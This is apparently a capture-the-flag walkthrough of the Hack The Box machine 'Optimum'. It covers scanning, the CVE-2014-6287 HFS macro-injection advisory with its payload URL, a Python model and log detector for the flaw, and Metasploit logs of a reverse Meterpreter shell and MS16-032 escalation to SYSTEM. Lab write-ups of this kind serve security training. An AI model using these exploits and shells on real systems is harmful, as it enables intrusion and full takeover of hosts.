HTB Optimum

$nmap -A -sV -p- 10.10.10.8

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-03 22:19 CEST
Nmap scan report for 10.10.10.8
Host is up (0.046s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   44.58 ms 10.10.14.1
2   44.74 ms 10.10.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.46 seconds

$nmap -p 80 --script vuln 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 17:05 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.8
Host is up (0.042s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|   
|_    Couldn't find a file-type field.
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|              
|     Extra information:
|       
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /~login [GENERIC]
|   
|     References:
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|       http://capec.mitre.org/data/definitions/274.html
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_      http://www.mkit.com.ar/labs/htexploit/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://www.tenable.com/plugins/nessus/55976
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.securityfocus.com/bid/49303

Nmap done: 1 IP address (1 host up) scanned in 259.07 seconds

$nikto -h 10.10.10.8

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.8
+ Target Hostname:    10.10.10.8
+ Target Port:        80
+ Start Time:         2020-07-03 22:28:03 (GMT2)
---------------------------------------------------------------------------
+ Server: HFS 2.3
+ Cookie HFS_SID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ 7864 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-07-03 22:47:29 (GMT2) (1166 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$searchsploit hfs

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service                                                                                                           | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                                                                                                                     | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                                                                                                                 | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation                                                                                                          | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                                                                                                  | windows/remote/37985.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                                                                                 | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                                                                                      | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                                                                                           | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                                              | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                         | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                                         | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                                    | windows/webapps/34852.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

$cat /usr/share/exploitdb/exploits/windows/remote/346

# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

The issue exists due to a poor regex in the file ParserLib.pas

function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;

It will not handle a null byte, so a request to

http://localhost:80/?search=%00{.exec|cmd.}

will stop the regex from parsing the macro, and the macro will be executed and remote code injection happens.

## EDB Note: This vulnerability will run the payload multiple times simultaneously.
##   Make sure to take this into consideration when crafting your payload (and/or listener).
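
As an added example that is not part of this writeup or of HFS's own source, the Python below models the failure the advisory describes and turns it into a log check: the vulnerable marker scan is assumed to stop at the first NUL byte (the C-string behaviour the advisory attributes to the regex wrapper), the hardened variant scans the whole length-prefixed buffer and treats an embedded NUL as a hit, and a detector flags access-log requests that combine a percent-encoded NUL with a macro opener. The log lines are constructed, not taken from the box.

```python
import re
from urllib.parse import unquote_to_bytes

# The marker regex from HFS 2.3's ParserLib.pas, as quoted in the advisory.
MACRO_MARKER = re.compile(rb"\{[.:]|[.:]\}|\|", re.M)
# A macro opener on its own; used by the log detector.
MACRO_OPEN = re.compile(rb"\{[.:]")


def find_macro_marker_vulnerable(s: bytes, ofs: int = 0) -> int:
    """Model of findMacroMarker as the advisory describes it.

    Assumption (ours, for the model): the regex engine treats the buffer as a
    C string, so it stops at the first NUL and never sees markers behind it.
    Returns the offset of the first marker, or -1 when none is found."""
    visible = s.split(b"\x00", 1)[0]
    m = MACRO_MARKER.search(visible, ofs)
    return m.start() if m else -1


def find_macro_marker_fixed(s: bytes, ofs: int = 0) -> int:
    """Hardened variant: scan the whole buffer regardless of NULs, and report
    an embedded NUL as a hit so the caller refuses the input outright."""
    nul = s.find(b"\x00", ofs)
    m = MACRO_MARKER.search(s, ofs)
    hits = [p for p in (nul, m.start() if m else -1) if p >= 0]
    return min(hits) if hits else -1


# Constructed access-log lines in common log format (sample data, not real).
LOG_LINES = [
    b'10.10.14.24 - - [04/Jul/2020:17:07:01 +0200] "GET /?search=report.pdf HTTP/1.1" 200 5678',
    b'10.10.14.24 - - [04/Jul/2020:17:07:03 +0200] "GET /?search=%00{.exec|cmd.} HTTP/1.1" 200 1234',
    b'10.10.14.24 - - [04/Jul/2020:17:07:04 +0200] "GET /?search=%00%7B.exec%7Ccmd.%7D HTTP/1.1" 200 1234',
    b'10.10.14.24 - - [04/Jul/2020:17:07:05 +0200] "GET /~login HTTP/1.1" 401 0',
]

REQUEST_PATH = re.compile(rb'"(?:GET|POST|HEAD) (\S+) HTTP/')


def is_macro_injection(request_path: bytes) -> bool:
    """Flag a request whose percent-decoded path carries a NUL byte together
    with an HFS macro opener. A legitimate search string contains neither."""
    decoded = unquote_to_bytes(request_path)
    return b"\x00" in decoded and MACRO_OPEN.search(decoded) is not None


def flag_suspicious(lines):
    """Return the raw request paths from the given log lines that match."""
    flagged = []
    for line in lines:
        m = REQUEST_PATH.search(line)
        if m and is_macro_injection(m.group(1)):
            flagged.append(m.group(1))
    return flagged


if __name__ == "__main__":
    payload = b"\x00{.exec|cmd.}"
    print("vulnerable scan:", find_macro_marker_vulnerable(payload))  # -1: marker missed
    print("fixed scan:     ", find_macro_marker_fixed(payload))       # 0: NUL reported
    for path in flag_suspicious(LOG_LINES):
        print("flagged:", path.decode())
```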

msf5 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

msf5 > use 1

msf5 exploit(windows/http/rejetto_hfs_exec) >

msf5 exploit(windows/http/rejetto_hfs_exec) > options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8

rhost => 10.10.10.8

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Using URL: http://0.0.0.0:8080/kyVqHTCln
[*] Local IP: http://192.168.21.129:8080/kyVqHTCln
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /kyVqHTCln
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.8:49185) at 2020-07-04 17:07:05 +0200
[!] Tried to delete %TEMP%\AkUaAWs.vbs, unknown result
[*] Server stopped.

meterpreter >

meterpreter > ls

Listing: C:\Users\kostas\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2020-07-10 09:49:03 +0200  %TEMP%
100666/rw-rw-rw-  282     fil   2017-03-18 12:57:16 +0100  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 12:58:52 +0100  hfs.exe
100444/r--r--r--  32      fil   2017-03-18 13:13:18 +0100  user.txt.txt
100666/rw-rw-rw-  1910    fil   2020-07-10 09:56:08 +0200  xTVFbX.txt

meterpreter > cat user.txt.txt

d0c3XXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > getuid

Server username: OPTIMUM\kostas
meterpreter >

meterpreter > sysinfo

Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

Sysinfo shows that we are on a Windows 2012 R2 server with an x64 architecture, while the Meterpreter payload itself is x86.

Because the default reverse_tcp payload is 32-bit (x86), we should migrate this shell into a process that matches the system's architecture.

meterpreter > ps

Process List
============

PID   PPID  Name                     Arch  Session  User            Path
---   ----  ----                     ----  -------  ----            ----
0     0     [System Process]                                        
4     0     System                                                  
228   4     smss.exe                                                
328   320   csrss.exe                                               
332   476   VGAuthService.exe                                       
380   320   wininit.exe                                             
392   372   csrss.exe                                               
436   372   winlogon.exe                                            
476   380   services.exe                                            
484   380   lsass.exe                                               
524   476   spoolsv.exe                                             
544   476   svchost.exe                                             
576   476   svchost.exe                                             
656   436   dwm.exe                                                 
668   476   svchost.exe                                             
712   476   svchost.exe                                             
764   476   svchost.exe                                             
804   476   svchost.exe                                             
836   476   svchost.exe                                             
964   476   svchost.exe                                             
1048  476   vmtoolsd.exe                                            
1064  476   ManagementAgentHost.exe                                 
1380  3020  PAYTwcGPiWOW.exe         x64   1        OPTIMUM\kostas  C:\Users\kostas\AppData\Local\Temp\radF96EB.tmp\PAYTwcGPiWOW.exe
1392  476   svchost.exe                                             
1448  476   dllhost.exe                                             
1612  544   WmiPrvSE.exe                                            
1676  476   msdtc.exe                                               
1800  2336  conhost.exe              x64   1        OPTIMUM\kostas  C:\Windows\System32\conhost.exe
1836  1984  conhost.exe              x64   1        OPTIMUM\kostas  C:\Windows\System32\conhost.exe
1984  1380  cmd.exe                  x64   1        OPTIMUM\kostas  C:\Windows\System32\cmd.exe
2040  2356  RMDGbbcoDuoYu.exe        x86   1        OPTIMUM\kostas  C:\Users\kostas\AppData\Local\Temp\radEBB9C.tmp\RMDGbbcoDuoYu.exe
2052  712   taskhostex.exe           x64   1        OPTIMUM\kostas  C:\Windows\System32\taskhostex.exe
2132  2076  explorer.exe             x64   1        OPTIMUM\kostas  C:\Windows\explorer.exe
2336  2040  cmd.exe                  x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\cmd.exe
2356  2588  wscript.exe              x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\wscript.exe
2560  2132  vmtoolsd.exe             x64   1        OPTIMUM\kostas  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2588  2132  hfs.exe                  x86   1        OPTIMUM\kostas  C:\Users\kostas\Desktop\hfs.exe
3020  2588  wscript.exe              x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\wscript.exe

The migrate command moves the session into a 64-bit process; explorer.exe (PID 2132, x64, running as OPTIMUM\kostas in the listing above) is the target here.

meterpreter > migrate 2132

[*] Migrating from 2040 to 2132...
[*] Migration completed successfully.
meterpreter >

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.8 - Collecting local exploits for x64/windows...
[*] 10.10.10.8 - 15 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
meterpreter > background
[*] Backgrounding session 1...

msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/local/bypassuac_dotnet_profiler
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > options

Module options (exploit/windows/local/bypassuac_dotnet_profiler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION                        yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 1

session => 1

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > options

Module options (exploit/windows/local/bypassuac_dotnet_profiler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       1                yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf5 exploit(windows/local/bypassuac_dotnet_profiler) >run

[*] Started reverse TCP handler on 192.168.21.129:4444
[*] UAC is Enabled, checking level...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > use exploit/windows/local/bypassuac_sdclt
msf5 exploit(windows/local/bypassuac_sdclt) > options

Module options (exploit/windows/local/bypassuac_sdclt):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION                        yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf5 exploit(windows/local/bypassuac_sdclt) > set session 1

session => 1

msf5 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[*] UAC is Enabled, checking level...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/bypassuac_sdclt) >

msf5 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

msf5 > use 1
msf5 exploit(windows/http/rejetto_hfs_exec) > options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8

rhost => 10.10.10.8

msf5 exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.14.24

srvhost => 10.10.14.24

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Using URL: http://10.10.14.24:8080/N7gLVUX
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /N7gLVUX
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.8:49192) at 2020-07-04 17:39:17 +0200
[!] Tried to delete %TEMP%\viwwLc.vbs, unknown result
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.24:4444 -> 10.10.10.8:49187) at 2020-07-04 17:39:23 +0200
[*] Server stopped.

meterpreter >

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.8 - Collecting local exploits for x64/windows...
[*] 10.10.10.8 - 15 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.

meterpreter > use post/multi/recon/local_exploit_suggester

Loading extension post/multi/recon/local_exploit_suggester...
[-] Failed to load extension: No module of the name post/multi/recon/local_exploit_suggester found

meterpreter > background

[*] Backgrounding session 2...

msf5 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1

session => 1

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 31 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1

session => 1

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\ADtFWRG.ps1...
[*] Compressing script contents...
[+] Compressed size: 3592
[*] Executing exploit script...
__ __ ___ ___   ___     ___ ___ ___
|  V  |  _|_  | |  _|___|   |_  |_  |
|     |_  |_| |_| . |___| | |_  |  _|
|_|_|_|___|_____|___|   |___|___|___|
                                   
              [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2100

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2104
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

0oFgcUjn5k02ue1mt1nS733SgnkT4Qyu
[+] Executed on target machine.
[+] Deleted C:\Users\kostas\AppData\Local\Temp\ADtFWRG.ps1
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.21.129   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.14.24

lhost => 10.10.14.24

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.24:4444
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\ULyzuEyTYsWRz.ps1...
[*] Compressing script contents...
[+] Compressed size: 3600
[*] Executing exploit script...
__ __ ___ ___   ___     ___ ___ ___
|  V  |  _|_  | |  _|___|   |_  |_  |
|     |_  |_| |_| . |___| | |_  |  _|
|_|_|_|___|_____|___|   |___|___|___|
                                   
              [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1420

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 1964
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

xmBLOvMWprzTob0dJLxTX8DP5bbzuk0z
[+] Executed on target machine.
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.14.24:4444 -> 10.10.10.8:49194) at 2020-07-04 17:46:24 +0200
[+] Deleted C:\Users\kostas\AppData\Local\Temp\ULyzuEyTYsWRz.ps1

meterpreter >

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > dir

Listing: C:\Users\kostas\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2020-07-10 09:49:03 +0200  %TEMP%
100666/rw-rw-rw-  282     fil   2017-03-18 12:57:16 +0100  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 12:58:52 +0100  hfs.exe
100444/r--r--r--  32      fil   2017-03-18 13:13:18 +0100  user.txt.txt
100666/rw-rw-rw-  1910    fil   2020-07-10 09:56:08 +0200  xTVFbX.txt

meterpreter >

meterpreter > cd ..
meterpreter > dir

Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-18 12:52:50 +0100  Administrator
40777/rwxrwxrwx   0     dir   2013-08-22 16:48:41 +0200  All Users
40555/r-xr-xr-x   0     dir   2013-08-22 15:36:16 +0200  Default
40777/rwxrwxrwx   0     dir   2013-08-22 16:48:41 +0200  Default User
40555/r-xr-xr-x   4096  dir   2013-08-22 15:36:16 +0200  Public
100666/rw-rw-rw-  174   fil   2013-08-22 17:39:32 +0200  desktop.ini
40777/rwxrwxrwx   8192  dir   2017-03-18 12:57:09 +0100  kostas

meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > dir

Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-18 12:52:56 +0100  desktop.ini
100444/r--r--r--  32    fil   2017-03-18 13:13:57 +0100  root.txt

meterpreter > cat root.txt

51edXXXXXXXXXXXXXXXXXXXXXXXXXXXX
